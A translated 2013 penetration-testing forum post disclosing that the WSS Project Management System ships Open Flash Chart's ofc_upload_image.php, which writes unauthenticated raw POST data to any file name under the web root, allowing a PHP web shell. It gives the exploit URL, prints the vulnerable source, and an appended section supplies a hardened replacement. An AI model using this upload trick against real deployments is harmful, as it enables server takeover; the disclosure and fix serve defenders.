中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: WSS Project Management System: POST get shell

Author: admin    Time: 2013-2-23 12:38
Title: WSS Project Management System: POST get shell
POST data is written by the vulnerable file to a file with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name)

POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php
[attach]201[/attach]
[attach]202[/attach]
The latest version of WSS still ships this vulnerable file; even the paid version has it, and so does the demo deployed in the Sina app store~
  O, G' Z% M3 R( ]7 j; ^4 \
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: basename() only strips directory components; the extension of the
// client-supplied ?name= value is never checked, so any file name is accepted.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// NOTE: the raw request body is written verbatim, with no authentication
// and no check that it is actually image data.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
[attach]203[/attach]

Fix:
This vulnerable file is a tragedy. How to fix it: add permission checks, extension checks and the like~ do it yourself.
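As an added example of the fix suggested above (this is not the WSS project's or Open Flash Chart's code), here is a replacement for ofc_upload_image.php that keeps the same purpose, storing a PNG sent as the raw request body, but closes each of the gaps in the original: it requires an authenticated session, validates that the body really is a PNG, ignores the client-supplied name entirely, and writes to a directory outside the web root. The session check (`is_logged_in()`, keyed on `$_SESSION['user_id']`) and the upload directory path are assumptions; adapt them to the host application.

```php
<?php
// Hardened chart-image upload handler (added example, not the project's code).
// Assumptions: the host app stores the logged-in user's id in $_SESSION['user_id'],
// and ../../private-uploads is a directory the web server does not serve.
declare(strict_types=1);

// 1. Authorisation: only an authenticated user may store chart images.
function is_logged_in(): bool {
    return isset($_SESSION['user_id']);   // assumption about the host application
}

// 2. Content validation: the body must carry the 8-byte PNG signature and
//    parse as IMAGETYPE_PNG; anything else (including PHP source) is refused.
function is_valid_png(string $data): bool {
    $sig = "\x89PNG\r\n\x1a\n";
    if (strncmp($data, $sig, strlen($sig)) !== 0) {
        return false;
    }
    $info = @getimagesizefromstring($data);
    return $info !== false && $info[2] === IMAGETYPE_PNG;
}

// 3. Destination: never derived from client input. A random name with a
//    fixed .png extension, inside a directory outside the document root.
function safe_destination(string $dir): string {
    return rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.png';
}

// Returns [HTTP status, message]; the message on success is the stored file name.
function handle_upload(string $uploadDir, int $maxBytes = 2 * 1024 * 1024): array {
    if (!is_logged_in()) {
        return [403, 'forbidden'];
    }
    // php://input replaces $HTTP_RAW_POST_DATA, which was removed in PHP 7.
    $raw = file_get_contents('php://input');
    if ($raw === false || $raw === '' || strlen($raw) > $maxBytes) {
        return [400, 'bad size'];
    }
    if (!is_valid_png($raw)) {
        return [415, 'not a PNG'];
    }
    // 0750 instead of the original 0777: no world-writable upload directory.
    if (!is_dir($uploadDir) && !mkdir($uploadDir, 0750, true)) {
        return [500, 'cannot create upload dir'];
    }
    $dest = safe_destination($uploadDir);
    if (file_put_contents($dest, $raw, LOCK_EX) === false) {
        return [500, 'write failed'];
    }
    chmod($dest, 0640);
    return [200, basename($dest)];
}

session_start();
[$status, $message] = handle_upload(__DIR__ . '/../../private-uploads');  // assumed path
http_response_code($status);
header('Content-Type: text/plain');
echo $message;
```

Two points about the design. The original relied on `basename()`, which only stops directory traversal; the extension and the content were still attacker-controlled, and because `tmp-upload-images/` sits under the web root the server happily executed whatever landed there. Generating the name server-side removes the extension problem, the signature plus `getimagesizefromstring()` check removes the content problem, and keeping the directory outside the document root (or, failing that, configuring the web server to never execute scripts from it) means that even a future validation bug cannot turn an upload into code execution. Serving the stored image back then goes through a separate read-only endpoint that maps the returned name to the private directory.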
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2